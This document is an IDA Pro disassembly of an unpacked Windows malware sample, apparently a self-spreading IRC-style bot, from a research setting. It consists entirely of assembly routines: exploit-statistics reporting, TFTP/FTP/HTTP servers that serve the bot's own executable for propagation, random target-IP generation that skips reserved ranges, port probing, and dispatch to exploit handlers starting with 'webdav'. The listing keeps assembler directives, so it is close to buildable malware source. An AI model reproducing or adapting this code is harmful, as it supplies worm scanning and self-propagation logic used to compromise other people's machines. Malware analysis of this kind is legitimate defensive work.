;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 151AA8868C89886F23AE1D80FB2031B7
; File Name : u:\work\151aa8868c89886f23ae1d80fb2031b7_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001E9D7 ( 125399.)
; Section size in file : 0001E9D7 ( 125399.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_4089DC+4C6D�p
; DATA XREF: sub_47E1B0+15D�r ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_414415
cmp dword_42B068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42B070
loc_401033: ; CODE XREF: sub_401000+6B�j
mov eax, [esi]
loc_401035: ; DATA XREF: sub_47E1B0+82�r
; sub_47E1B0+2A9�r
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_414415
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_4142E0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: sub_401000+2B�j
push dword_47BF18
call sub_411551
loc_401079: ; DATA XREF: sub_47E1B0+277�r
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_414415
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_4142E0
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
lea eax, [ebp+var_200]
push eax
call sub_401EFF
add esp, 38h
pop edi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CA proc near ; CODE XREF: sub_4089DC+458D�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_41248A
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ebp+arg_C]
push dword_42E640[eax*8]
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_414415
add esp, 0Ch
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_401106: ; CODE XREF: sub_4010CA+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_414415
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
loc_40112B: ; DATA XREF: sub_47E1B0+8E�r
call sub_4056BF
lea eax, [ebp+var_200]
push eax
call sub_401EFF
add esp, 18h
leave
retn
sub_4010CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401B9D+52�p
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_94 = byte ptr 9Ch
arg_114 = byte ptr 11Ch
arg_194 = dword ptr 19Ch
arg_1B4 = dword ptr 1BCh
arg_1BC = dword ptr 1C4h
arg_1C0 = dword ptr 1C8h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_1B4]
cmp eax, 0FFFFFFFFh
jz locret_4014F1
loc_401159: ; DATA XREF: sub_47E1B0:loc_47E2C2�w
; sub_47E1B0+156�r ...
imul eax, 3Ch
push ebx
loc_40115D: ; DATA XREF: sub_47E1B0:loc_47E417�r
xor ebx, ebx
cmp dword_42B074[eax], ebx
loc_401165: ; DATA XREF: sub_47E1B0+2B0�w
; sub_47E1B0+2F9�r ...
push esi
jz loc_4013DF
push 5
call sub_41248A
test eax, eax
pop ecx
jnz loc_4014EF
mov eax, dword_42BEBC
push edi
push 104h
mov edi, offset dword_42FC54
loc_40118C: ; DATA XREF: sub_47E1B0+12F�r
push edi
push ebx
mov dword_42FE64, eax
mov dword_42FE60, ebx
call ds:dword_420010 ; GetModuleFileNameA
push 103h
loc_4011A4: ; DATA XREF: sub_47E1B0+1E�w
; sub_47E1B0+51�r ...
push offset byte_42BF4C
mov esi, offset dword_42FD58
push esi
call sub_4144A0
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42FC50, eax
mov eax, [ebp+arg_1BC]
mov dword_42FEE8, eax
push 7Fh
jnz short loc_4011F4
lea eax, [ebp+arg_94]
push eax
push offset dword_42FE68
call sub_4144A0
mov dword_42FEEC, 1
jmp short loc_40120B
; ---------------------------------------------------------------------------
loc_4011F4: ; CODE XREF: sub_401141+94�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42FE68
call sub_4144A0
mov dword_42FEEC, ebx
loc_40120B: ; CODE XREF: sub_401141+B1�j
add esp, 0Ch
push esi
push edi
push dword_42FE64
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_414415
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_41229A
add esp, 20h
mov dword_42FE5C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42FC50
push offset sub_411DD2
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, dword_42FE5C
imul ecx, 234h
cmp eax, ebx
mov dword_4366B4[ecx], eax
jnz loc_401327
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_414415
add esp, 0Ch
loc_40128A: ; CODE XREF: sub_401141+1EE�j
lea eax, [ebp+var_204]
push eax
call sub_401EFF
pop ecx
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 0F82Fh
div ecx
push 104h
mov edi, offset dword_42F9AC
push edi
push ebx
mov dword_42FBB8, ebx
add edx, 400h
mov dword_42FBBC, edx
call ds:dword_420010 ; GetModuleFileNameA
push 103h
push offset byte_42BF4C
mov esi, offset dword_42FAB0
push esi
call sub_4144A0
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42F9A8, eax
mov eax, [ebp+arg_1BC]
mov dword_42FC40, eax
push 7Fh
jnz short loc_401334
lea eax, [ebp+arg_94]
push eax
push offset dword_42FBC0
call sub_4144A0
mov dword_42FC44, 1
jmp short loc_40134B
; ---------------------------------------------------------------------------
loc_40131F: ; CODE XREF: sub_401141+1EC�j
push 32h
call ds:dword_420000 ; Sleep
loc_401327: ; CODE XREF: sub_401141+128�j
cmp dword_42FEF0, ebx
jz short loc_40131F
jmp loc_40128A
; ---------------------------------------------------------------------------
loc_401334: ; CODE XREF: sub_401141+1BF�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42FBC0
call sub_4144A0
mov dword_42FC44, ebx
loc_40134B: ; CODE XREF: sub_401141+1DC�j
add esp, 0Ch
push esi
push edi
push dword_42FBBC
push dword_42F9A8
call sub_407D15
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on: %s:%d, File: "...
push eax
call sub_414415
push ebx
lea eax, [ebp+var_204]
push 6
push eax
call sub_41229A
add esp, 24h
mov dword_42FBB4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42F9A8
push offset sub_403BFF
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, dword_42FBB4
imul ecx, 234h
cmp eax, ebx
mov dword_4366B4[ecx], eax
pop edi
jnz short loc_4013D2
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_4014D3
; ---------------------------------------------------------------------------
loc_4013CA: ; CODE XREF: sub_401141+297�j
push 32h
call ds:dword_420000 ; Sleep
loc_4013D2: ; CODE XREF: sub_401141+276�j
cmp dword_42FC48, ebx
jz short loc_4013CA
jmp loc_4014E2
; ---------------------------------------------------------------------------
loc_4013DF: ; CODE XREF: sub_401141+25�j
cmp dword_42B078[eax], ebx
jz loc_4014EF
push 4
call sub_41248A
test eax, eax
pop ecx
jnz loc_4014EF
push 104h
mov esi, offset dword_42F884
push esi
push ebx
call ds:dword_420010 ; GetModuleFileNameA
push 5Ch
push esi
call sub_414470
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40141D
mov [eax], bl
loc_40141D: ; CODE XREF: sub_401141+2D8�j
mov eax, dword_42BEC0
mov dword_42F988, eax
lea eax, [ebp+arg_94]
push eax
push offset dword_42F5FC
mov dword_42F99C, ebx
call sub_414415
mov eax, [ebp+arg_194]
pop ecx
pop ecx
mov ecx, [ebp+arg_1BC]
push esi
push dword_42F988
mov dword_42F994, ecx
mov ecx, [ebp+arg_1C0]
push eax
mov dword_42F5F8, eax
mov dword_42F998, ecx
call sub_407D15
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_414415
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_41229A
add esp, 20h
loc_401495: ; DATA XREF: .data:off_42CC20�o
; .data:off_42D4D8�o
mov dword_42F990, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42F5F8
push offset sub_404EE8
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, dword_42F990
imul ecx, 234h
cmp eax, ebx
mov dword_4366B4[ecx], eax
jnz short loc_4014FB
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_4014D3: ; CODE XREF: sub_401141+284�j
lea eax, [ebp+var_204]
push eax
call sub_414415
add esp, 0Ch
loc_4014E2: ; CODE XREF: sub_401141+299�j
; sub_401141+3C2�j
lea eax, [ebp+var_204]
push eax
call sub_401EFF
pop ecx
loc_4014EF: ; CODE XREF: sub_401141+35�j
; sub_401141+2A4�j ...
pop esi
pop ebx
locret_4014F1: ; CODE XREF: sub_401141+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_4014F3: ; CODE XREF: sub_401141+3C0�j
push 32h
call ds:dword_420000 ; Sleep
loc_4014FB: ; CODE XREF: sub_401141+384�j
cmp dword_42F9A4, ebx
jz short loc_4014F3
jmp short loc_4014E2
sub_401141 endp
; =============== S U B R O U T I N E =======================================
sub_401505 proc near ; CODE XREF: sub_401967:loc_4019C9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
lea esi, ds:42E640h[esi*8]
push dword ptr [esi]
call dword_4358D8 ; htonl
inc eax
push eax
call dword_43592C ; htonl
mov [esi], eax
pop esi
retn
sub_401505 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_401525 proc near ; CODE XREF: sub_4017F1+71�p
var_E4 = word ptr -0E4h
var_E2 = word ptr -0E2h
var_E0 = word ptr -0E0h
var_DE = word ptr -0DEh
var_DC = word ptr -0DCh
var_DA = word ptr -0DAh
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = word ptr -0C4h
var_C2 = word ptr -0C2h
var_C0 = word ptr -0C0h
var_BE = word ptr -0BEh
var_BC = word ptr -0BCh
var_BA = word ptr -0BAh
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = word ptr -0B4h
var_B2 = word ptr -0B2h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = word ptr -0ACh
var_AA = word ptr -0AAh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = word ptr -0A4h
var_A2 = word ptr -0A2h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = word ptr -94h
var_92 = word ptr -92h
var_90 = word ptr -90h
var_8E = word ptr -8Eh
var_8C = word ptr -8Ch
var_8A = word ptr -8Ah
var_88 = word ptr -88h
var_86 = word ptr -86h
var_84 = word ptr -84h
var_82 = word ptr -82h
var_80 = word ptr -80h
var_7E = word ptr -7Eh
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = word ptr -70h
var_6E = word ptr -6Eh
var_6C = word ptr -6Ch
var_6A = word ptr -6Ah
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0E4h
xor eax, eax
mov [ebp+74h+var_E4], ax
mov [ebp+74h+var_E2], 1
mov [ebp+74h+var_E0], 2
mov [ebp+74h+var_DE], 5
mov [ebp+74h+var_DC], 7
mov [ebp+74h+var_DA], 0Bh
mov [ebp+74h+var_D8], 17h
mov [ebp+74h+var_D6], 1Bh
mov [ebp+74h+var_D4], 1Fh
mov [ebp+74h+var_D2], 24h
mov [ebp+74h+var_D0], 25h
mov [ebp+74h+var_CE], 27h
mov [ebp+74h+var_CC], 29h
mov [ebp+74h+var_CA], 2Ah
mov [ebp+74h+var_C8], 31h
mov [ebp+74h+var_C6], 32h
mov [ebp+74h+var_C4], 49h
mov [ebp+74h+var_C2], 4Ah
mov [ebp+74h+var_C0], 4Bh
mov [ebp+74h+var_BE], 4Ch
mov [ebp+74h+var_BC], 4Dh
mov [ebp+74h+var_BA], 4Eh
mov [ebp+74h+var_B8], 4Fh
mov [ebp+74h+var_B6], 59h
mov [ebp+74h+var_B4], 5Ah
mov [ebp+74h+var_B2], 5Bh
mov [ebp+74h+var_B0], 5Ch
mov [ebp+74h+var_AE], 5Dh
mov [ebp+74h+var_AC], 5Eh
mov [ebp+74h+var_AA], 5Fh
mov [ebp+74h+var_A8], 60h
mov [ebp+74h+var_A6], 61h
mov [ebp+74h+var_A4], 62h
mov [ebp+74h+var_A2], 63h
mov [ebp+74h+var_A0], 64h
mov [ebp+74h+var_9E], 65h
mov [ebp+74h+var_9C], 66h
mov [ebp+74h+var_9A], 67h
mov [ebp+74h+var_98], 68h
mov [ebp+74h+var_96], 69h
mov [ebp+74h+var_94], 6Ah
mov [ebp+74h+var_92], 6Bh
mov [ebp+74h+var_90], 6Ch
mov [ebp+74h+var_8E], 6Dh
mov [ebp+74h+var_8C], 6Eh
mov [ebp+74h+var_8A], 6Fh
mov [ebp+74h+var_88], 70h
mov [ebp+74h+var_86], 71h
mov [ebp+74h+var_84], 72h
mov [ebp+74h+var_82], 73h
mov [ebp+74h+var_80], 74h
mov [ebp+74h+var_7E], 75h
mov [ebp+74h+var_7C], 76h
mov [ebp+74h+var_7A], 77h
mov [ebp+74h+var_78], 78h
mov [ebp+74h+var_76], 79h
mov [ebp+74h+var_74], 7Ah
mov [ebp+74h+var_72], 7Bh
mov [ebp+74h+var_70], 7Ch
mov [ebp+74h+var_6E], 7Dh
mov [ebp+74h+var_6C], 7Eh
mov [ebp+74h+var_6A], 7Fh
mov [ebp+74h+var_68], 0ADh
mov [ebp+74h+var_66], 0AEh
mov [ebp+74h+var_64], 0AFh
mov [ebp+74h+var_62], 0B0h
mov [ebp+74h+var_60], 0B1h
mov [ebp+74h+var_5E], 0B2h
mov [ebp+74h+var_5C], 0B3h
mov [ebp+74h+var_5A], 0B4h
mov [ebp+74h+var_58], 0B5h
mov [ebp+74h+var_56], 0B6h
mov [ebp+74h+var_54], 0B7h
mov [ebp+74h+var_52], 0B8h
mov [ebp+74h+var_50], 0B9h
mov [ebp+74h+var_4E], 0BAh
mov [ebp+74h+var_4C], 0BBh
mov [ebp+74h+var_4A], 0BDh
mov [ebp+74h+var_48], 0BEh
mov [ebp+74h+var_46], 0C5h
mov [ebp+74h+var_44], 0DFh
mov [ebp+74h+var_42], 0E0h
mov [ebp+74h+var_40], 0E1h
mov [ebp+74h+var_3E], 0E2h
mov [ebp+74h+var_3C], 0E3h
mov [ebp+74h+var_3A], 0E4h
mov [ebp+74h+var_38], 0E5h
mov [ebp+74h+var_36], 0E6h
mov [ebp+74h+var_34], 0E7h
mov [ebp+74h+var_32], 0E8h
mov [ebp+74h+var_30], 0E9h
mov [ebp+74h+var_2E], 0EAh
mov [ebp+74h+var_2C], 0EBh
mov [ebp+74h+var_2A], 0ECh
mov [ebp+74h+var_28], 0EDh
mov [ebp+74h+var_26], 0EEh
mov [ebp+74h+var_24], 0EFh
mov [ebp+74h+var_22], 0F0h
mov [ebp+74h+var_20], 0F1h
mov [ebp+74h+var_1E], 0F2h
mov [ebp+74h+var_1C], 0F3h
mov [ebp+74h+var_1A], 0F4h
mov [ebp+74h+var_18], 0F5h
mov [ebp+74h+var_16], 0F6h
mov [ebp+74h+var_14], 0F7h
mov [ebp+74h+var_12], 0F8h
mov [ebp+74h+var_10], 0F9h
mov [ebp+74h+var_E], 0FAh
mov [ebp+74h+var_C], 0FBh
mov [ebp+74h+var_A], 0FCh
mov [ebp+74h+var_8], 0FDh
mov [ebp+74h+var_6], 0FEh
mov [ebp+74h+var_4], 0FFh
loc_4017D6: ; CODE XREF: sub_401525+2BF�j
movsx ecx, [ebp+eax*2+74h+var_E4]
cmp [ebp+74h+arg_0], ecx
jz short loc_4017ED
inc eax
cmp eax, 71h
jb short loc_4017D6
xor al, al
loc_4017E8: ; CODE XREF: sub_401525+2CA�j
add ebp, 74h
leave
retn
; ---------------------------------------------------------------------------
loc_4017ED: ; CODE XREF: sub_401525+2B9�j
mov al, 1
jmp short loc_4017E8
sub_401525 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017F1 proc near ; CODE XREF: sub_401967+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push edi
or edi, 0FFFFFFFFh
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
lea ecx, [eax+1]
loc_40180D: ; CODE XREF: sub_4017F1+21�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40180D
sub eax, ecx
cmp eax, 0Fh
jbe short loc_401822
xor eax, eax
jmp loc_4018C7
; ---------------------------------------------------------------------------
loc_401822: ; CODE XREF: sub_4017F1+28�j
push esi
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_4145F3
add esp, 18h
cmp [ebp+var_4], edi
jnz short loc_40186C
call sub_4145D1
mov esi, 0FFh
jmp short loc_401859
; ---------------------------------------------------------------------------
loc_401854: ; CODE XREF: sub_4017F1+79�j
call sub_4145D1
loc_401859: ; CODE XREF: sub_4017F1+61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ebp+var_4], edx
call sub_401525
test al, al
pop ecx
jnz short loc_401854
loc_40186C: ; CODE XREF: sub_4017F1+55�j
cmp [ebp+var_C], edi
mov esi, 100h
jnz short loc_401883
call sub_4145D1
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_401883: ; CODE XREF: sub_4017F1+83�j
cmp [ebp+var_8], edi
jnz short loc_401893
call sub_4145D1
cdq
idiv esi
mov [ebp+var_8], edx
loc_401893: ; CODE XREF: sub_4017F1+95�j
mov edx, [ebp+var_10]
cmp edx, edi
pop esi
jnz short loc_4018A9
call sub_4145D1
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_4018A9: ; CODE XREF: sub_4017F1+A8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add edx, [ebp+var_C]
shl edx, 8
add eax, edx
mov dword_42E640[ecx*8], eax
loc_4018C7: ; CODE XREF: sub_4017F1+2C�j
pop edi
leave
retn
sub_4017F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018CA proc near ; CODE XREF: sub_401967+A9�p
; sub_40398A+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_435808 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4018F3
xor eax, eax
jmp short loc_401962
; ---------------------------------------------------------------------------
loc_4018F3: ; CODE XREF: sub_4018CA+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_435954 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4357AC ; ioctlsocket
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_4357C0 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4358AC ; select
push esi
mov edi, eax
call dword_435914 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_401962: ; CODE XREF: sub_4018CA+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4018CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401967 proc near ; DATA XREF: sub_401B9D+144�o
var_3B0 = dword ptr -3B0h
var_394 = dword ptr -394h
var_390 = byte ptr -390h
var_380 = byte ptr -380h
var_300 = dword ptr -300h
var_2FC = byte ptr -2FCh
var_27C = byte ptr -27Ch
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_254 = byte ptr -254h
var_1D4 = byte ptr -1D4h
var_1C4 = byte ptr -1C4h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 74h
mov esi, eax
pop ecx
lea edi, [ebp+var_1D4]
rep movsd
mov edi, [ebp+var_2C]
mov dword ptr [eax+1CCh], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], edi
mov [ebp+arg_0], eax
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
mov ebx, edi
pop ecx
imul ebx, 234h
jmp loc_401B79
; ---------------------------------------------------------------------------
loc_4019B3: ; CODE XREF: sub_401967+220�j
cmp [ebp+var_10], 0
push eax
jz short loc_4019C9
lea eax, [ebp+var_1D4]
push eax
call sub_4017F1
pop ecx
jmp short loc_4019CE
; ---------------------------------------------------------------------------
loc_4019C9: ; CODE XREF: sub_401967+51�j
call sub_401505
loc_4019CE: ; CODE XREF: sub_401967+60�j
pop ecx
push [ebp+arg_0]
mov esi, eax
push dword_4366A4[ebx]
push [ebp+var_3C]
push esi
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_254]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_414415
lea eax, [ebp+var_254]
push eax
lea eax, dword_4364A0[ebx]
push eax
call sub_414415
push [ebp+var_38]
push [ebp+var_3C]
push esi
call sub_4018CA
add esp, 2Ch
cmp eax, 1
jnz loc_401B6E
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_401AA2
push offset dword_42F5E0
call ds:dword_42001C ; RtlEnterCriticalSection
push [ebp+var_3C]
push esi
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_254]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_414415
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_401A84
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+var_C0]
jnz short loc_401A78
lea eax, [ebp+var_140]
loc_401A78: ; CODE XREF: sub_401967+109�j
push eax
push [ebp+var_40]
call sub_4056BF
add esp, 14h
loc_401A84: ; CODE XREF: sub_401967+EE�j
lea eax, [ebp+var_254]
push eax
call sub_401EFF
mov [esp+3B0h+var_3B0], offset dword_42F5E0
call ds:dword_420018 ; RtlLeaveCriticalSection
jmp loc_401B6E
; ---------------------------------------------------------------------------
loc_401AA2: ; CODE XREF: sub_401967+BE�j
push esi
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_390]
push eax
call sub_414415
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aWebdav ; "webdav"
push eax
lea eax, [ebp+var_27C]
push eax
call sub_414415
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_401AE6
lea eax, [ebp+var_140]
loc_401AE6: ; CODE XREF: sub_401967+177�j
push eax
lea eax, [ebp+var_2FC]
push eax
call sub_414415
mov eax, [ebp+var_144]
pop ecx
mov [ebp+var_300], eax
pop ecx
xor eax, eax
loc_401B03: ; CODE XREF: sub_401967+1AD�j
mov cl, [ebp+eax+var_1C4]
mov [ebp+eax+var_380], cl
inc eax
test cl, cl
jnz short loc_401B03
mov eax, [ebp+var_40]
mov [ebp+var_394], eax
mov eax, [ebp+var_18]
mov [ebp+var_260], eax
mov eax, [ebp+var_14]
mov [ebp+var_25C], eax
mov eax, [ebp+var_3C]
mov [ebp+var_270], eax
mov eax, [ebp+var_20]
mov [ebp+var_268], eax
imul eax, 3Ch
sub esp, 140h
push 50h
pop ecx
mov [ebp+var_26C], edi
lea esi, [ebp+var_394]
mov edi, esp
rep movsd
call off_42B06C[eax]
mov edi, [ebp+var_4]
add esp, 140h
loc_401B6E: ; CODE XREF: sub_401967+B4�j
; sub_401967+136�j
push 7D0h
call ds:dword_420000 ; Sleep
loc_401B79: ; CODE XREF: sub_401967+47�j
mov eax, dword_4366A4[ebx]
cmp dword_42E644[eax*8], 0
jnz loc_4019B3
push edi
call sub_41255E
pop ecx
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
